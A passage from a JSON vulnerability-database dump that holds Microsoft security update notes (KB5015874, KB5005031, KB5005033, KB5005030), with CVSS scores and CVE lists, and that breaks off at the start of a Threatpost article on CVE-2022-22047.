"obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "KB5015877", "href": "https://support.microsoft.com/en-us/help/5015877", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:54:09", "description": "None\n## **Summary**\n\nLearn more about this cumulative security update, including improvements, any known issues, and how to get the update. \n\n**REMINDER**[Windows 8.1](<https://docs.microsoft.com/lifecycle/products/windows-81>) will reach end of support on January 10, 2023 for all editions, at which point technical assistance and software updates will no longer be provided. If you have devices running Windows 8.1, we recommend upgrading them to a more current, in-service, and supported Windows release. If devices do not meet the technical requirements to run a more current release of Windows, we recommend that you replace the device with one that supports Windows 11.Microsoft will not be offering an Extended Security Update (ESU) program for Windows 8.1. Continuing to use Windows 8.1 after January 10, 2023 may increase an organization\u2019s exposure to security risks or impact its ability to meet compliance obligations.For more information, see [Windows 8.1 support will end on January 10, 2023](<https://support.microsoft.com/windows/windows-8-1-support-will-end-on-january-10-2023-3cfd4cde-f611-496a-8057-923fba401e93>).[Windows Server 2012 R2](<https://docs.microsoft.com/lifecycle/products/windows-server-2012-r2>) will reach end of support on October 10, 2023 for Datacenter, Essentials, Embedded Systems, Foundation, and Standard.\n\n**Note** For information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements**\n\nThis cumulative security update includes improvements that are part of update [KB5014738](<https://support.microsoft.com/help/5014738>) (released June 14, 2022) and includes new improvements for the following issues:\n\n * Starting with this release, we are displaying a dialog box to remind users about the End of Support (EOS) for Windows 8.1 in January 2023. If you click **Remind me later**, the dialog box will appear once every 35 days. If you click **Remind me after the end of support date**, the dialog box will not appear again until after the EOS date. This reminder does not appear on the following:\n * Managed Pro and Enterprise devices.\n * Windows Embedded 8.1 Industry Enterprise and Windows Embedded 8.1 Industry Pro devices.\n * When you use [Encrypting File System (EFS)](<https://docs.microsoft.com/windows/win32/fileio/file-encryption>) files over a remote [Web Distributed Authoring and Versioning (WebDAV) protocol](<https://docs.microsoft.com/openspecs/windows_protocols/ms-wdv/bfde1057-4214-4ca5-a431-fab36ff625bc>) connection, the connection might be unsuccessful.\n * [NTLM authentication](<https://docs.microsoft.com/troubleshoot/windows-server/windows-security/ntlm-user-authentication>) through an external trust is unsuccessful when serviced by a domain controller that has the January 11, 2022 or later Windows update installed. This issue occurs if the DC is in a non-root domain and does not hold the [global catalog](<https://docs.microsoft.com/windows/win32/ad/global-catalog>) (GC) role. Impacted operations may log the following errors:\n * The security database has not been started.\n * The domain was in the wrong state to perform the security operation.\n * 0xc00000dd (STATUS_INVALID_DOMAIN_STATE)\n * Applications might not run after an AppLocker publisher rule is deployed.\n * Addresses a known issue that might prevent you from using the Wi-Fi hotspot feature. When attempting to use the hotspot feature, the host device might lose the connection to the Internet after a client device connects.\n * Addresses a known issue in which Windows Servers that use the Routing and Remote Access Service (RRAS) might be unable to correctly direct Internet traffic. Devices which connect to the server might not connect to the Internet, and servers can lose connection to the Internet after a client device connects.\nFor more information about the resolved security vulnerabilities, please refer to the [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website and the [July 2022 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jul>).\n\n## **Known issues in this update**\n\n**Symptom**| **Next step** \n---|--- \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nWe are working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update**We strongly recommend that you install the latest servicing stack update (SSU) for your operating system before you install the latest Rollup. SSUs improve the reliability of the update process to mitigate potential issues while installing the Rollup and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).If you use Windows Update, the latest SSU ([KB5016264](<https://support.microsoft.com/help/5016264>)) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). **Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5015874>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 8.1, Windows Server 2012 R2, Windows Embedded 8.1 Industry Enterprise, Windows Embedded 8.1 Industry Pro**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5015874](<https://download.microsoft.com/download/8/6/e/86eb07bd-caad-4045-ab27-08b4eb12d28a/5015874.csv>). \n\n## **References**\n\nFor information about the security updates released on July 12, 2022, see [Deployments - Security Update Guide](<https://msrc.microsoft.com/update-guide/deployments>).Learn about the [standard terminology](<https://docs.microsoft.com/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) that is used to describe Microsoft software updates.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mskb", "title": "July 12, 2022\u2014KB5015874 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "KB5015874", "href": "https://support.microsoft.com/en-us/help/5015874", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page. **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information. \nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the July 13, 2021 servicing stack update (SSU) (KB5004748) or the latest SSU (KB5005412) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005031>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005031](<https://download.microsoft.com/download/5/9/0/5901bffe-66e8-4289-9077-b87ae1af9813/5005031.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005031 (OS Build 18363.1734)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005031", "href": "https://support.microsoft.com/en-us/help/5005031", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20**For information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 2004 update history [home page](<https://support.microsoft.com/en-us/help/4555932>). **Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\n**Note **To view the list of addressed issues, click or tap the OS name to expand the collapsible section.\n\n### \n\n__\n\nWindows 10, version 21H1\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 20H2\n\nThis security update includes quality improvements. Key changes include:\n\n * This build includes all the improvements from Windows 10, version 2004.\n * No additional issues were documented for this release.\n\n### \n\n__\n\nWindows 10, version 2004\n\n**Note: **This release also contains updates for Microsoft HoloLens (OS Build 19041.1159) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n### Windows 10 servicing stack update - 19041.1161, 19042.1161, and 19043.1161\n\n * This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nWhen using the Microsoft Japanese Input Method Editor (IME) to enter Kanji characters in an app that automatically allows the input of Furigana characters, you might not get the correct Furigana characters. You might need to enter the Furigana characters manually.**Note **The affected apps are using the **ImmGetCompositionString()** function.| This issue is resolved in KB5005101. \nDevices with Windows installations created from custom offline media or custom ISO image might have [Microsoft Edge Legacy](<https://support.microsoft.com/en-us/microsoft-edge/what-is-microsoft-edge-legacy-3e779e55-4c55-08e6-ecc8-2333768c0fb0>) removed by this update, but not automatically replaced by the new Microsoft Edge. This issue is only encountered when custom offline media or ISO images are created by slipstreaming this update into the image without having first installed the standalone servicing stack update (SSU) released March 29, 2021 or later.**Note **Devices that connect directly to Windows Update to receive updates are not affected. This includes devices using Windows Update for Business. Any device connecting to Windows Update should always receive the latest versions of the SSU and latest cumulative update (LCU) without any extra steps. | To avoid this issue, be sure to first slipstream the SSU released March 29, 2021 or later into the custom offline media or ISO image before slipstreaming the LCU. To do this with the combined SSU and LCU packages now used for Windows 10, version 20H2 and Windows 10, version 2004, you will need to extract the SSU from the combined package. Use the following steps to extract the SSU:\n\n 1. Extract the cab from the msu via this command line (using the package for KB5000842 as an example): **expand Windows10.0-KB5000842-x64.msu /f:Windows10.0-KB5000842-x64.cab &lt;destination path&gt;**\n 2. Extract the SSU from the previously extracted cab via this command line: **expand Windows10.0-KB5000842-x64.cab /f:* &lt;destination path&gt;**\n 3. You will then have the SSU cab, in this example named **SSU-19041.903-x64.cab**. Slipstream this file into your offline image first, then the LCU.\nIf you have already encountered this issue by installing the OS using affected custom media, you can mitigate it by directly installing the [new Microsoft Edge](<https://www.microsoft.com/edge>). If you need to broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing the June 21, 2021 (KB5003690) update, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment or when installing the standalone package from Microsoft Update Catalog:If your devices do not have the May 11, 2021 update (KB5003173) or later LCU, you **must **install the special standalone August 10, 2021 SSU (KB5005260).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005033>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005033](<https://download.microsoft.com/download/1/e/e/1eeb7268-cb6a-4865-a98b-9c51f0ec7beb/5005033.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1161, 19042.1161, and 19043.1161](<https://download.microsoft.com/download/f/7/4/f74513f3-7838-4538-89f5-8be86d571826/SSU_version_19041_1161.csv>). \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005033 (OS Builds 19041.1165, 19042.1165, and 19043.1165)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005033", "href": "https://support.microsoft.com/en-us/help/5005033", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-19T10:52:17", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**11/17/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1809 update history home page.\n\n**Note **This release also contains updates for Microsoft HoloLens (OS Build 17763.2114) released August 10, 2021. Microsoft will release an update directly to the Windows Update Client to improve Windows Update reliability on Microsoft HoloLens that have not updated to this most recent OS Build.\n\n## Highlights\n\n * Updates the default installation privilege requirement so that you must be an administrator to install drivers when using [Point and Print](<https://docs.microsoft.com/en-us/windows-hardware/drivers/print/introduction-to-point-and-print>). \n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Changes the default privilege requirement for installing drivers when using Point and Print. After installing this update, you must have administrative privileges to install drivers. If you use Point and Print, see [KB5005652](<https://support.microsoft.com/topic/873642bf-2634-49c5-a23b-6d8e9a302872>), [Point and Print Default Behavior Change](<https://aka.ms/PointPrintMSRCBlog>), and [CVE-2021-34481](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34481>) for more information.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device.For more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\n### \n\n__\n\nClick or tap to view the known issues\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing KB4493509, devices with some Asian language packs installed may receive the error, \"0x800f0982 - PSFX_E_MATCHING_COMPONENT_NOT_FOUND.\"| This issue is addressed by updates released June 11, 2019 and later. We recommend you install the latest security updates for your device. Customers installing Windows Server 2019 using media should install the latest [Servicing Stack Update (SSU)](<https://docs.microsoft.com/windows/deployment/update/servicing-stack-updates>) before installing the language pack or other optional components. If using the [Volume Licensing Service Center (VLSC)](<https://www.microsoft.com/licensing/servicecenter/default.aspx>), acquire the latest Windows Server 2019 media available. The proper order of installation is as follows:\n\n 1. Install the latest prerequisite SSU, currently [KB5005112](<https://support.microsoft.com/help/5005112>)\n 2. Install optional components or language packs\n 3. Install latest cumulative update\n**Note** Updating your device will prevent this issue, but will have no effect on devices already affected by this issue. If this issue is present in your device, you will need to use the workaround steps to repair it.**Workaround:**\n\n 1. Uninstall and reinstall any recently added language packs. For instructions, see [Manage the input and display language settings in Windows 10](<https://support.microsoft.com/windows/manage-the-input-and-display-language-settings-in-windows-12a10cb4-8626-9b77-0ccb-5013e0c7c7a2>).\n 2. Click **Check for Updates **and install the April 2019 Cumulative Update or later. For instructions, see [Update Windows 10](<https://support.microsoft.com/windows/update-windows-3c5ae7fc-9fb6-9af1-1984-b5e0412c556a>).\n**Note **If reinstalling the language pack does not mitigate the issue, use the In-Place-Upgrade feature. For guidance, see [How to do an in-place upgrade on Windows](<https://docs.microsoft.com/troubleshoot/windows-server/deployment/repair-or-in-place-upgrade>), and [Perform an in-place upgrade of Windows Server](<https://docs.microsoft.com/windows-server/get-started/perform-in-place-upgrade>). \nAfter installing KB5001342 or later, the Cluster Service might fail to start because a Cluster Network Driver is not found.| This issue occurs because of an update to the PnP class drivers used by this service. After about 20 minutes, you should be able to restart your device and not encounter this issue. \nFor more information about the specific errors, cause, and workaround for this issue, please see KB5003571. \nAfter installing this update, the Encrypted File System (EFS) API [OpenEncryptedFileRaw(A/W)](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>), often used in backup software, will not work when you back up to or from a Windows Server 2008 SP2 device. OpenEncryptedFileRaw will continue to work on all other versions of Windows (local and remote).| This behavior is expected because we addressed the issue in CVE-2021-36942.**Note** If you cannot use backup software on Windows 7 SP1 and Server 2008 R2 SP1 or later after installing this update, contact the manufacturer of your backup software for updates and support. \nAfter installing updates released April 22, 2021 or later, an issue occurs that affects versions of Windows Server that are in use as a Key Management Services (KMS) host. Client devices running Windows 10 Enterprise LTSC 2019 and Windows 10 Enterprise LTSC 2016 might fail to activate. This issue only occurs when using a new Customer Support Volume License Key (CSVLK). **Note** This does not affect activation of any other version or edition of Windows. Client devices that are attempting to activate and are affected by this issue might receive the error, \"Error: 0xC004F074. The Software Licensing Service reported that the computer could not be activated. No Key Management Service (KMS) could be contacted. Please see the Application Event Log for additional information.\"Event Log entries related to activation are another way to tell that you might be affected by this issue. Open **Event Viewer **on the client device that failed activation and go to **Windows Logs **&gt; **Application**. If you see only event ID 12288 without a corresponding event ID 12289, this means one of the following:\n\n * The KMS client could not reach the KMS host.\n * The KMS host did not respond.\n * The client did not receive the response.\nFor more information on these event IDs, see [Useful KMS client events - Event ID 12288 and Event ID 12289](<https://docs.microsoft.com/windows-server/get-started/activation-troubleshoot-kms-general#event-id-12288-and-event-id-12289>).| This issue is resolved in KB5009616. \n \n## How to get this update\n\n**Before installing this update**Prerequisite:You **must **install the May 11, 2021 servicing stack update (SSU) (KB5003243) or the latest SSU (KB5005112) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security fixes. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005030>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5005030](<https://download.microsoft.com/download/3/f/c/3fc996a5-7267-4a7c-9a5b-83ade06204dc/5005030.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mskb", "title": "August 10, 2021\u2014KB5005030 (OS Build 17763.2114)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34481", "CVE-2021-36942", "CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "KB5005030", "href": "https://support.microsoft.com/en-us/help/5005030", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2022-07-18T12:20:51", "description": "A Windows 11 vulnerability, part of Microsoft\u2019s Patch Tuesday roundup of fixes, is being exploited in the wild, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to advise patching of the elevation of privileges flaw by August 2.\n\nThe recommendation is directed at federal agencies and concerns [CVE-2022-22047](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047>), a vulnerability that carries a CVSS score of high (7.8) and exposes Windows Client Server Runtime Subsystem (CSRSS) used in Windows 11 (and earlier versions dating back to 7) and also Windows 